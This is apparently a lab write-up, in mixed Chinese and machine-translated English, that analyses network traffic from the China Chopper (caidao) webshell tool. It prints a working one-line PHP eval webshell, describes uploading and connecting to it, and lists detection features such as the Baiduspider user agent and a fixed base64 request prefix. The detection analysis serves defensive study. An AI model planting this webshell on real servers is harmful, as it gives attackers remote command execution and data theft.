前言

Webshell是hackerA malicious script that is often used,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻.

hackerCommon vulnerabilities are usually exploited,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的.

有个想法,Check out how his tool works,Then analyze the characteristics of the kitchen knife.The most I use is a kitchen knife,Ant Sword cannot be installed,There will be an opportunity to re-analyze later.

环境

virtual machine usedphpstudy搭建的网站,and use it in a virtual machinewiresharkCapture traffic packets.

The physical machine uses a Chinese kitchen knife：https://github.com/raddyfiy/caidao-official-version

上传webshell并连接

一句话木马：

<?php eval($_POST[caidao]);?>

通过某种途径,A sentence Trojan was uploaded to the root domain name of the website

Then inside the kitchen knife tool,添加一个新的shell连接,密码caidao

同时也开启wireshark进行抓包,为了更直观的分析,对ip进行了过滤,Only look with physical machines(192.168.80.1) 的通信

成功连接到webshell

翻看一下目录

执行系统命令

Uploaded a test text

分析流量

I have uploaded the captured packets to csdn,详细见：https://download.csdn.net/download/weixin_52444045/86269653

特征一：

All requests are consistent,方式为POST,路径为webshell的url地址.

我的是POST /123.php

特征二：

In the request header initiated by the kitchen knife tool,默认的UAFor Baidu's crawler Baiduspider

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

But this thing is possiblecaidao.confmodified inside,Still be careful

特征三

This is the most important feature,If the request packet contains the following information,那么99%That's where the kitchen knife is connected toshell了

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

in all request packets,in the content of the request body,keyThe value is the connection chopperwebshell的密码,The latter value is usedbase64进行了加密,Here are some values ​​for analysis

The circled one can be usedbase64decoded,The prefix is ​​the same in every request,Be sure to pay attention to this prefix！！

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

After decoding it is below：

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("[email protected]");

特征四

in each return packet,结果是用[email protected] include


By returning the package, you can intuitively determine what operation is done.

个人理解

The principle of graphics operations to perform some operations is,利用php、asp、jspfunction to complete the operation.

found latercaidao.conf文件里面,There are functions that write each operation

The following compares a captured traffic packet with the code

You can see that this is the operation of uploading files

可以看出规律：
The code to perform the corresponding operation is

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("[email protected]");
+
The function code for the corresponding operation
+
;echo("[email protected]");die();

然后通过base64编码,into the request body.So the prefix is ​​fixed,See Feature 3 for details.

By analyzing the captured traffic packets,Every request packet can be decrypted and found out what the operation is